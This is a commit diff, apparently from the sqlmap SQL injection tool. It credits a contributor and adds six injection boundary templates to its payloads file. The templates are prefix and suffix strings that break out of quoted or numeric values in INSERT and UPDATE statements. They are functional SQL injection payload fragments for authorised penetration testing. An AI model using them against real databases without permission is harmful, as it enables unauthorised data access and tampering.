adding INSERT/UPDATE generic boundaries

doc/THANKS

@@ -368,6 +368,9 @@ Christopher Patten <cpatten@sunera.com>
 Zack Payton <zack.payton@executiveinstruments.com>
     for reporting a minor bug
 
+Jaime Penalba <nighterman@painsec.com>
+    for contributing a patch for INSERT/UPDATE generic boundaries
+
 Travis Phillips <perfect_insanity2004@yahoo.com>
     for suggesting a minor enhancement
 

xml/payloads.xml

@@ -485,7 +485,63 @@ Formats:
         <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
         <suffix></suffix>
     </boundary>
-    <!-- End of generic boundaries -->
+    <!-- End of pre-WHERE generic boundaries -->
+
+    <!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' || (SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>) || '</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' || (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>) || '</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix> + (SELECT [RANDNUM1] FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix> + (SELECT [RANDNUM1] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' + (SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>) + '</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' + (SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>) + '</suffix>
+    </boundary>
+    <!-- End of INSERT/UPDATE generic boundaries -->
 
 
     <!-- Boolean-based blind tests - WHERE/HAVING clause -->